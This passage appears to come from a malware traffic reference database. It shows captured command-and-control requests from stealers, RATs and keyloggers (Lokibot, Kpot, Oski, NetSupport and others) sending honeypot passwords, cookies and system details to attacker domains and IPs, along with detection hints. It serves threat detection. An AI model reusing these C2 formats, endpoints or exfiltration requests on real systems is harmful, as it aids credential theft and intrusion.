AQAAAA== VGhlIGlucHV0IGlzIG5vdCBhIHZhbGlkIEJhc2UtNjQgc3RyaW5nIGFzIGl0IGNvbnRhaW5zIGEgbm9uLWJhc2UgNjQgY2hhcmFjdGVyLCBtb3JlIHRoYW4gdHdvIHBhZGRpbmcgY2hhcmFjdGVycywgb3IgYW4gaWxsZWdhbCBjaGFyYWN0ZXIgYW1vbmcgdGhlIHBhZGRpbmcgY2hhcmFjdGVycy4g ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jssloader.png "JSSLoader") #### Keybase ~~~ GET /panel/post.php?type=passwords&machinename=USER-PC&application=MS%20Outlook%202002/2003/2007/2010&link=192.168.1.1&username=honey@pot.com&password=honeypass356 HTTP/1.1 Host: pacificglobal.ga Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Fri, 04 Oct 2019 19:55:10 GMT Content-Type: text/html Content-Length: 985 Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/keybase.png "Keybase") #### Koadic ~~~ POST /html?CRADZPYFZ4=825b2f6bafed407c88254aa1e804be93;9Q90FBZM0Q=; HTTP/1.1 Connection: Keep-Alive 
Content-Type: application/octet-stream Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) encoder: 1252 shellchcp: 437 Content-Length: 140 Host: googlechromeupdater.twilightparadox.com:448 USER-PC\admin~~~USER-PC~~~Windows 7 Professional***7601~~~Unknown~~~x86~~~C:\Users\admin\AppData\Local\Temp ~~~192.168.100.159~~~1252~~~437 HTTP/1.0 200 OK Server: Apache Date: Wed, 22 Jan 2020 16:29:00 GMT ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/koadic.png "Koadic") #### Kpot stealer Follow tcp stream, not http stream in wireshark ~~~ GET /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: allseasongudinc.tech HTTP/1.1 200 OK Server: nginx Date: Tue, 27 Aug 2019 13:52:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.28 194 KwV4X3wlPk10s8hXH869gjRybIA8vP7vCwSm1Z2WW5LpEMiELVOQvustrfDp9B9igx9Jz8+noWaPlvipqvlX1nEJsgEGpkK29iHNRB5rmSyH9hPAko1ndCVOfVjGwUO/THlWJSdlDlb0FyJA2+ji7xH/Hlcwx38AIJ1SHUpp+hYHUnavdTv5uJnIAoB23+3dt7f1I54mr2Pp+eddWPHgFeIL/2BeLqaWQL1IzY1EqZhS9oIluDYmojSWgWeu6mecE5suxDRksh0KOyA7518HX4ziYflt6gBOa+daqP42C7K7PspsZGUMTRIRKayAQIT84HYmE7a/jRK1twsOz8gdJIrbaOTLaZWx/4q3Nd8bAB2yH8PvCwRz2YVsmzjBv93n3ksOHYuFtO1GcnOk0Igj 0 POST /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/octet-stream Content-Encoding: binary Host: allseasongudinc.tech Content-Length: 1965022 P@F,jbhNH2pUP_s..tzH W-.z.Cb]_u.PBCy9bhNH2pUdoG4PBCy9bhNH2pUdo.r...<|XH :S.7...U 2'.M.4.!Q.:..!@..*.] .=.q.:.."G..,.eP+...I.%A3L$OI4l+,.B.@.R+rqh{w@.TP.p.5`]+~ .{vA TQ.y8.% A%]>%m.V.GDq.Acn]v.b{vK.U^D{.GbTVs.ZqsO.[]xx.I_W_q.ir{H3Hbn.t6.-#.q...?p.-.r.7'. %Q"." I. :)n=<..(G?$7%n..*'E. 
'.(_9'0%u ..qcE.1;.b~6; 4h;..z4_%)z}...Mxh '&U^6..h>arqM3T[vy.Fmn\w.c{vM.h[~~.I`R_t ZqsO.[Xvy8Z_7=.|...so_Zh.g9.YZv.`..HxS+ }.3.S-u..tw8z![~xq6a&I#Y>!+..Sb,!\.{..*.ZssK h^}p.Ec\et.hqzL Pb}x.FlQYw.iHpI.UQ~p.z.n<.w...+3&'.u.@d\_~.eH!.W.F-'___U_u.ZtpA.W^vB.@mWVr.bHpI.TQ{~.Cln\w.g{sA.hBDhm6."&.q...?.+$. .P...%V50..I../ ;.qSZ#7.T.F-'___V^s.d{qA.Vb}~.IgRYv.fHpI.SX{q.zfVZv.hpuI.h[~~.Ie\^M.Z..73SF.}.GmQ_s.`lrI.RZw{.Fd\\s.gsqL.ZF..x$$U#.ea.".W.<-x.z4..*@~!,..hZ.|.DlVWq.ZqtO.U_{{.@_W_..iqwI3QZ{x.Hm\Zu>cruN.RP.B.zu;).r... >8V.!.3 ]30, V....[.1..4h.-,.P....]. /;.b...N...:E8.4..Me";3..Q.}0m .>)&A.'9.P6'D.S.0..(_~!,..hQ|y.zfR^~.gwpO h[~p.IfP_M.arwL.QZ|
~~~

~~~
GET /admtest/configuration.php?botid=BEF522C314BC1291311131 HTTP/1.1
Host: 213.226.100.184
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 13 Jul 2020 08:26:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot.png "Kpot stealer")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot2.png "Kpot stealer")

#### KrugBot

~~~
POST /absc/index.php HTTP/1.0
Host: raiseyourdongers.wtf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 224

tSVkhHUFWeXjujTxCNBQl7h1QW2zElMRx+g8ceDNF/4mUj4PV8MaCjFjhqCGYGprTPLjXu5i
w+xWBGqDB44jDCJcr66AgCqhZYhj04B5PCPqMNaf8It2IfuX9Ffysaqp+tjcUhGW3JH1nJk8
ud1kko0C6+v/tp2PLOVR0ac3GacRi0dUf/+ASue6AJNOfh4WliURnubviRXJkcj+5f7vA3Xa
jg==
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krugbot.png "Krugbot")

#### Krypton Stealer

~~~
POST /connect_meta.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Client
Host: orl05511cn.temp.swtest.ru
Content-Length: 26
Cache-Control: no-cache

id=01&message=test_message
~~~
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krypton.png "KryptonStealer")

#### Lazagne

~~~
POST /te.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------58748130728276
User-Agent: Mozilla/5.0 Gecko/20100115 Firefox/3.6
Host: 185.86.148.123
Content-Length: 1526
Cache-Control: no-cache

-----------------------------58748130728276
Content-Disposition: form-data; name="userfile"; filename="admin-USER-PC-passwords.txt"
Content-Type:application/x-gzip

########## User: admin ##########

------------------- Firefox passwords -----------------

[+] Password found !!!
URL: https://m.facebook.com
Login: honey@pot.com
Password: honeypass356

------------------- Outlook passwords -----------------

[-] Password not found !!!
Account Name: honey@pot.com.
POP3 User: honey@pot.com.
POP3 Server: 192.168.1.1.
u'Delivery Store EntryID: \x00\x00\ua138\u10bb\ue505\u1a10\ubba1\x08\u2a2b\uc256\x00\u736d\u7370\u2e74\u6c64l\x00\x00\u494e\u4154\ubff9\u01b8\uaa00\u3700\u6ed9\x00\x00C:\\Users\\admin\\Documents\\Outlook Files\\honey@pot.com.pst\x00'
SMTP Secure Connection: 0
SMTP Server: 192.168.1.1.
Mini UID: 224868084
'Delivery Folder EntryID: \x00\x00\x00\x00\x81 \xa1\x9f\x92\x06>N\x9c\xc7t\xd9H\xba>f\x82\x80\x00\x00'
u'clsid: \u457b\u3444\u3537\u3134\u2d31\u3042\u3644\u312d\u4431\u2d32\u4338\u4233\u302d\u3130\u3430\u3242\u3641\u3736\u7d36'
Display Name: HoneyPot Mail.
POP3 Password: honeypass356.
Email: honey@pot.com.
u'Leave on Server: \u3139\u3537\u3730'

------------------- Google chrome passwords -----------------

[+] Password found !!!
URL:
Login: honey@pot.com
Password: honeypass356

[+] 3 passwords have been found.
For more information launch it again with the -v option

elapsed time = 0.84299993515

-----------------------------58748130728276--

HTTP/1.1 200 OK
Date: Tue, 29 Oct 2019 21:10:11 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lazagne.png "Lazagne")

#### Loda

I've never seen this without the beta flag

~~~
x|lugocv|x|admin|WIN_7|X86| |Disabled|1.1.2|ddd|Pr720X21280X3|Desktop|0|beta ZeXro0
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/loda.png "Loda")

#### Lokibot

Follow tcp stream, not http stream in wireshark

~~~
POST /sky/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fueda.info
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 8DAA705A
Content-Length: 176
Connection: close

..'.......ckav.ru.. ...a.d.m.i.n.......U.S.E.R.-.P.C.......U.S.E.R.-.P.C......................+................0...8.5.6.9.A.A.F.F.6.3.A.A.A.7.1.D.8.0.4.0.0.E.2.5.....Rqbay....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lokibot.png "Lokibot")

#### Metamorpho/Metamorfo BR Banker

~~~
POST / HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 249
Host: 18.217.112.176
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

spxndja=HERETEVFDEVFJERERFEERFFEXERFJFGFKER&kfcemfgj=CCO&gvtsavp=EFMFM&ixjpblda=HEDEEDOEGDODXCPDKDMDMDYEFDXEEDSCMEHFAFFCCDACMCTCSCMDCCXCQCSDUDLCMCMDOFFEXFDFAFKEYCCCKEFFFFAFLEVEUCCEDFLERFLEVFKCLCMCMEHFAFFEUFGFOFKCCDNEVEWEVFFEUEVFJCMCYCWDLCM&xhwen=YDL

HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 15:18:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 15:18:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
~~~

~~~
POST /hooponopono/puma.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Host: leavenois.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/3.0 (compatible; Indy Library)

vv=OP22--22-10&vw=&mods=&uname=VVNFUi1QQw%3D%3D&cname=Ti05Ng%3D%3D&os=V2luZG93cyA3IFByb2Zlc3Npb25hbDYuMTc2MDEtNjQ%3D&is=&iss=SUUuQXNzb2NGaWxlLkhUTQ%3D%3D&iav=

HTTP/1.0 200 OK
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Tue, 22 Oct 2019 20:06:32 GMT
Server: LiteSpeed
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorpho.png "Metamorpho")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorfo-1.png "Metamorpho")

#### Micropsia

~~~
POST /api/white_walkers/new HTTP/1.1
Connection: KeepAlive
Content-Type: multipart/form-data; boundary=--------121819110609549
Content-Length: 818
Cache-control: no-store
Host: accountforuser.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

----------121819110609549
Content-Disposition: form-data; name="daenerys"
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit

SkVOTklGRVItUENfSmVubmlmZXJfNUZ0MzNidWxETUMybzVG
----------121819110609549
Content-Disposition: form-data; name="betriebssystem"
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit

Windows 7 Service Pack 1 (Version 6.1, Build 7601, 64-bit Edition)
----------121819110609549
Content-Disposition: form-data; name="anwendung"
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit

ExecuteLibrary.exe v2.0.0
----------121819110609549
Content-Disposition: form-data; name="AV"
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit

No Instance(s) Available.
----------121819110609549--
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/micropsia.png "Micropsia")

#### MilkyBoy

~~~
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Adzq41ceq52e353512hSfj
Content-Length: 45
Host: qqwveqwevqwe.duckdns.org:10

key:Adz32151295uy129v5nqwrnvqwkjn5rv12n5vhSfj

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 8593928
Server: Werkzeug/0.15.4 Python/2.7.6
Date: Wed, 09 Oct 2019 22:09:57 GMT

TVqQAAMAAAAEAAAA/

POST / HTTP/1.1
Host: qqwveqwevqwe.duckdns.org:10
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
key: Adz32516047vhSfj
filename: 58759853857.zip
Content-Length: 5334
Content-Type: multipart/form-data; boundary=80790cc2554f462cb375dcc301f5c66a

--80790cc2554f462cb375dcc301f5c66a
Content-Disposition: form-data; name="payload"; filename="payload"

PK........G.IO............
...PASSWORDS/PK........G.IO+&.6v...........e.txt=.I.. .....Wx./X....%......g[VN6A...z~......x}....xH......*b....<@.W.P..X......,|*.]$.. }..%. .C{....7.W......Bas.....PK........I.IO................sys.txt].Ok.@....|..S...&jho.B..........R.[.OK(..].K.2.7.73o~...'..6D.>q....U..u.. .W..x.0....=.T.#...<0"....W.k.. .;..J1.q;X.{kz..S;_.f.t...D..Gh@......Q.v@G=}....m"...............Yy..!1U...i.xe...B.T%.. {5.....m...3.>....3.J..]Vh......&Y.@.8...T~1B!....l kk.:......m$....B.._.E........PK........G.IO................PASSWORDS/CBase/PK........G.IO................PASSWORDS/FBase/PK........G.IO................PASSWORDS/CBase/Google/PK........G.IO).L ........#...PASSWORDS/CBase/Google/cookies.json....PK........G.IO".......[...)...PASSWORDS/CBase/Google/loginpasswords.txt...=..r.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...x...Z.sy...2......(X).r....... .d...V:....%...r.$.......d@|cS3...PK........G.IO."{.o...C..."...PASSWORDS/CBase/Google/webdata.txt...=..r.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%......&..x...V.cy..2..K..sS.....2Ss@..\>.P........b.0.PK........G.IO................PASSWORDS/FBase/Mozilla/PK........G.IOp.0.$.......$...PASSWORDS/FBase/Mozilla/cookies.json..Mk.@.....!......$......Vl$..~.......-..j-...R/s.y..}.....8..q.zm.[..n.~U..e).z..7.7.............. ...^z.6..t#....(@W.r43...U.iT.-.....%6.....1......}5......iG..Ut.i|".I....$...~...Q.yr_.....tA.".. 
@.p...',.!O!e..T.v.6..T.hEY*..H..Sq)....L......~...CD....E.0..Sa.T ..`b.J*i...G..."xpF.......PK........o.)M0..W............PASSWORDS/FBase
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-1.png "Milkyboy 1")
![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-2.png "Milkyboy 2")

#### MirageFox

~~~
POST http://172.16.100.1/result%3Fhl%3Den%26meta%3Dghumeaylnlfdxfircvscxggbwkfnqdu HTTP/1.0
Accept: *.*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Proxy-Connection: Keep-Alive
Content-Length: 528
Encoding: gzip, deflate
Accept-Language: en-us
Host: 172.16.100.1
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/miragefox.png "MirageFox")

#### Nanocore

flag on "38 00 00 00 17" pattern:

~~~
00000000 38 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 8.....K, .e.....g
00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<.
00000020 04 ea d0 16 f2 cf 3e 51 29 18 55 e5 1c 7a 6a 91 ......>Q ).U..zj.
00000030 03 99 38 f7 ac 3b f7 89 85 2e c4 d8 ..8..;.. ....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-38.png "Nanocore 38")

flag on "40 00 00 00 17" pattern:

~~~
00000000 40 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 @.....K, .e.....g
00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<.
00000020 04 ea d0 16 87 30 8f fa 78 9d 2a 01 c2 51 ee 07 .....0.. x.*..Q..
00000030 bd e7 23 95 3e ab a1 04 ca 56 b3 fb b7 9b b7 3a ..#.>... .V.....:
00000040 13 e5 2b 52 ..+R
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-40.png "Nanocore 40")

flag on "50 00 00 00 82" pattern:

~~~
00000000 50 00 00 00 82 c8 36 7a 87 1b 91 70 6b 20 7f 17 P.....6z ...pk ..
00000010 ea 86 3a e9 07 fc 40 ae 0f ac bc f5 f2 6d f3 98 ..:...@. .....m..
00000020 71 7a 0b 19 4c 8e 58 bb 6c 69 5a 99 55 4a 72 c6 qz..L.X. liZ.UJr.
00000030 92 ed 39 fe 74 2a 9d b4 09 ca 5a 4a 83 dc 99 16 ..9.t*.. ..ZJ....
00000040 0a ea 28 ad ba f6 87 d0 b7 4d 45 78 6a 71 84 19 ..(..... .MExjq..
00000050 34 cc c6 79 4..y
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-50.png "Nanocore 50")

#### NetSupport RAT

~~~
POST http://179.43.159.246/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 179.43.159.246
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1

HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=.g+$.{.. \....W...bb...).w}..o..X..xf...

POST http://179.43.159.246/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Host: 179.43.159.246
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r..4.]..%y-.....=I...D3.W..i.7?....=@....F.f....&t.[..6ra..L.....?....>......5T.m.<..O....a.g.qwjW..I{~i...1......\.bH8Z&8.|gY@:......7. .\.(.K(...oC.x.m-.o.D.t....Lv...{.............=J.J...f.V=@.`t..i......

POST http://179.43.159.246/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Host: 179.43.159.246
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E.....V....k.9|||$(m..$C.M..=I0`!.....^.....?sq.
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netsupport.png "NetSupport RAT")

#### Netwire

flag on "41 00 00 00 99" pattern in initial packet:

~~~
00000000 41 00 00 00 99 80 3a e0 e8 5f d7 ea 8c af 76 cc A.....:. ._....v.
00000010 c4 cc ad 5a 10 72 cc d0 5e 64 d8 50 80 fc b6 e6 ...Z.r.. ^d.P....
00000020 54 25 bf e0 ea 7f 7b e4 ff 54 70 e8 eb c0 fa 80 T%....{. .Tp.....
00000030 a0 a0 f3 a0 b0 0a 94 04 84 31 7c 3f e7 8c 90 c5 ........ .1|?....
00000040 ce c4 11 97 d9 .....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netwire.png "Netwire 40")

#### Neutrino

~~~
POST /panel/52/tasks.php HTTP/1.0
Host: slipcentral.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: 180

_wv=Y21kJjkwMDU5YzM3LTEzMjAtNDFhNC1iNThkLTJiNzVhOTg1MGQyZiZZV1J0YVc0Z09pQlZVMFZTTFZCRElEb2dWVk5GVWkxUVF3JTNEJTNEJldpbmRvd3MlMjA3JTIwKDMyLWJpdCkmMCZOJTJGQSY1LjEmMDguMTAuMjAxOSZOT05F

HTTP/1.0 404 Not Found
Connection: close
X-Powered-By: PHP/5.6.40
Content-Type: text/html; charset=UTF-8
Content-Length: 1251
Date: Tue, 08 Oct 2019 00:52:53 GMT
Server: LiteSpeed
Vary: User-Agent

404 Not Found

Not Found

The requested URL /panel/52/tasks.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/neutrino.png "Neutrino")

#### Nukesped

~~~
POST /list.php?v=1530 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=FE4149CA-3412-4743-9789-F6C0D0371C4F
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 385
Host: lastedforcast.com

--FE4149CA-3412-4743-9789-F6C0D0371C4F
Content-Disposition: form-data; name="_media_1"

15868
--FE4149CA-3412-4743-9789-F6C0D0371C4F
Content-Disposition: form-data; name="_media_2"

16
--FE4149CA-3412-4743-9789-F6C0D0371C4F
Content-Disposition: form-data; name="file"; filename="Sy2LbbDxqF1W.img"
Content-Type: octet-stream

--FE4149CA-3412-4743-9789-F6C0D0371C4F--

HTTP/1.1 200 OK
Date: Fri, 12 Jun 2020 03:32:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31
X-Powered-By: PHP/7.2.31
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

0
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nukesped.png "Nukesped")

#### Orcus RAT

The machine name is sent as the TLS SNI

~~~
....j...f..].....*".....L...^...xG.F..... ...../.5... ..... . .2.8.......%.......... ...USER-PC. ......................M..]......~$....q.....d..o..t{8Y..& V5.....Xj..[...d.'v...3Y..9...}.....................0...0..0.......GY.I..l.C.!d.((n0 . *.H.. .....0!1.0...U....OrcusServerCertificate0 . 181004205345Z..20691004205345Z0!1.0...U....OrcusServerCertificate0..0 . *.H.. .........0..........C.}q. .%/.J..U..+U!...Zk.&5.". .on......w..NA..n..... ...ZM!...g..]....]Z..., ~h..?.......i'........u..... .r.|.o....2..A1KU.....0 . *.H..
...........}.#zu....*...eW.+..c8..qk^.8....F..S"u.:..=...C .K.z....P...Y..M[..d.2p..U....O=.|*4-....S;.b...I......1t.~Z..e.ETxk...r(u_g........a...?.y$t..LR.:..>...3j..gT .....DJH..N.MJD.eb...I...}.V^5a...\@.S..........4..u_...l$y....k*......|...D..Z .8S...i..z.9.&..5F.......A..V.c\.{..I...1|.W..td?...Y.....
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/orcus.png "Orcus RAT")

#### Origin Keylogger

~~~
From: sp@globalfinancel.com
To: new@globalfinancel.com
Date: 17 Oct 2019 15:03:43 +0000
Subject: admin/USER-PC Recovered Accounts
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 10/17/2019 15:03:33
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18= 5.117.118.92=0A
URL: https://www.facebook.com/
=0D=0AU= sername: honey@pot.com
=0D=0APassword: honeypass356
=0D=0AA= pplication: Chrome
=0D=0A
=0D=0AURL: 192.168.1.1
=0D=0A= Username: honey@pot.com
=0D=0APassword: honeypass356
=0D=0A= Application: Outlook
=0D=0A
=0D=0A

From: sp@globalfinancel.com
To: new@globalfinancel.com
Date: 17 Oct 2019 15:03:43 +0000
Subject: admin/USER-PC Recovered Cookies
Content-Type: multipart/mixed; boundary=--boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244

----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 10/17/2019 15:03:34
UserName: admin
ComputerName: USE= R-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int= el(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18= 5.117.118.92=0A
----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244
Content-Type: application/octet-stream; name=4dz3xb0p.hda.zip
Content-Transfer-Encoding: base64
Content-Disposition: attachment

UEsDBBQAAAgIAIRp/k5nVtI5VAoAAABwAAAjAAAANGR6M3hiMHAuaGRhL0Nocm9tZS9E
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/origin.png "Origin Keylogger")

#### Oski Stealer

~~~
POST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: gewe.tech
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

HTTP/1.1 200 OK
Connection: Keep-Alive
X-Powered-By: PHP/7.2.26
Content-Type: text/html; charset=UTF-8
Content-Length: 102
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Wed, 26 Feb 2020 11:23:13 GMT
Server: LiteSpeed

1;USERPROFILE\Downloads;*.dat,*.key,*.txt;1;LOCALAPPDATA\;*.dat,*.key,*.txt;1;APPDATA\;*.dat,*.key,*.txt;1;USERPROFILE\Documents;*.dat,*.key,*.txt;1;USERPROFILE\Desktop;*.dat,*.key,*.txt;

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 60097
Host: gewe.tech
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="file"; filename="_4052981232.zip"
Content-Type: zip

PK.........ZZP..*.#...&..."...autofill/Google Chrome_Default.txtUT ..!UV^!UV^!UV^s.,*..K.M.tOL*.L....I...%..e....r..PK.........ZZP............-...autofill/Mozilla Firefox_qldyz51w.default.txtUT
..!UV^!UV^!UV^..PK.........ZZP................cc/Google Chrome_Default.txtUT ..!UV^!UV^!UV^..PK.........ZZP............!...cookies/Google Chrome_Default.txtUT ..!UV^!UV^!UV^..PK.........ZZP..).........,...cookies/Mozilla Firefox_qldyz51w.default.txtUT ..!UV^!UV^!UV^..KK.@...S.OI.{..YV.....5%.2.....vb...T..B.\]8........y..{.7....67.....\(..&C%:..F&.Ce.P5..k.#q.....b..?.`Y...kyW.Sv.B..Z.R=...[o..z^..uiR.-.eg..p.@g.....Y*..|...Q...cU..9R.J. )....r...!.... Y.<.4.Pg...5..4"........@..]a.t.1.*. *D..v<....._/..._ .......r......L"&.$C...x..PK.........ZZP8G.......... ...passwords.txtUT ..!UV^ UV^ UV^...w.RpIMK,.).. .w..Rp..O.IUp.(..M...... f....[.....%&.&..g.%....r........R+. .K@..\....P....bcS3^..(......*S.r..Tk}..2sr...2.R..+`..d..PK.........ZZP.dwtv...T.......screenshot.jpgUT ..&UV^&UV^&UV^..u\TQ.5.. .."8 .. ... .CJJHJ..R .#...C.t.Jww..t.{...}?....}...9...93..k.u]{....,.....$..... ......C....q........w0...X..a..=....S.....R...S>~BMJ............O... +..3.$(w.....E..M.........W...;....4...T\.4\..F...............B..q...=.A...* ...-4t.[.....~.-\t<*......b<..>. .~.Z...>.o......]L.G.D..t...L.\.<.|../$$..edU..54.^j...653..t|............._.a...Q.1.bSR.....Y.E.%.e...U.....[Z.......GF........W.................\........\...[h.0..BA}.6...N.~... ......|.@.B....K....7r..$....../ ye..]......?......`..._...D......s..7.....yFo.......S* ....z..z.%^.~..8.... ....&T<.s.<..s.2.y}[..L.....i...4..h..+.. b6.Z.....U,.z0Xn.........K8.]...m_4..@...R.....Z..W.N...k~....+.....|....; *...6W'.....1f.....Y....,.5>!...m...7 .R'.f.E.`.M.,k..< ua..W.D.+.Q.W .q......d...k. ...system.txtUT i...PK.........ZZP................_1.zipUT 